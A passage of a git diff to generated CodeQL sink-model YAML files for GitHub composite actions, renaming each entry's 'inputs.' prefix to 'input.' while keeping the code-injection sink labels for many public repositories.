@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index cee842ae1c6..b30d898dcc1 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 535e832c1c3..979a9aca5c2 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index e1902fb488f..b180a319baa 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] - - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file + - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 2ede3df9864..fb5fa4d8e4e 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file + - ["scitools/iris", "*", "input.version", "code-injection", "generated"] + - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "input.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 1bea0aef935..cb9faef2bf6 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file + - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRepository", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 4a8bae9d2a1..e7eb6b732ff 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file + - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index c63ed017ae1..a1b1a4b71e8 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 544fc4b9951..2463b4a1d16 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file + - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 2d3871a2231..87e88b2c13d 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file + - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 4f18723df38..c0789d6e424 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] - - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file + - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index a96d86c7b5c..f617b9d172d 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index ff1b101be4a..f30719d58d8 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file + - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index fb7bdd0950e..84d5c96e63b 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file + - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 9b263d03357..d76ab136ab9 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file + - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 5e6e66c4be4..9e75660d1b3 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file + - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index cf545a95592..1cc6e837b84 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file + - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 0484e903515..b2e283c6983 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 756a1a0371a..d08bdb5d6f4 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index ed954bf6f97..4532947bc48 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 47aebb45825..518a27d9afc 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 28935d7a98b..bb21bcda68d 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 2ba9ff355e2..5f81d9bd406 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file + - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 530cc68ca4b..f8fe2344d0a 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] - - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index e75197656f5..377e439049c 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file + - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 21ea7ef13a9..1f087287d25 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] + - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e6d2a79b847..7f317ddad8e 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file + - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index ffd74df05e2..b1a9ea20344 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index f476d7160f6..37e39efd243 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] - - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "input.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index e95dacb65a9..9569d47329f 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"] - - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"] \ No newline at end of file + - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "input.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 42a9859aa23..6cf5dd84fbd 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"] \ No newline at end of file + - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index 029e4f95a2a..ce09307f8fb 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"] - - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"] \ No newline at end of file + - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 3223e185c7b..183319e32ff 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"] \ No newline at end of file + - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index 26fa1ce22b7..d8fb3f98b09 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml 
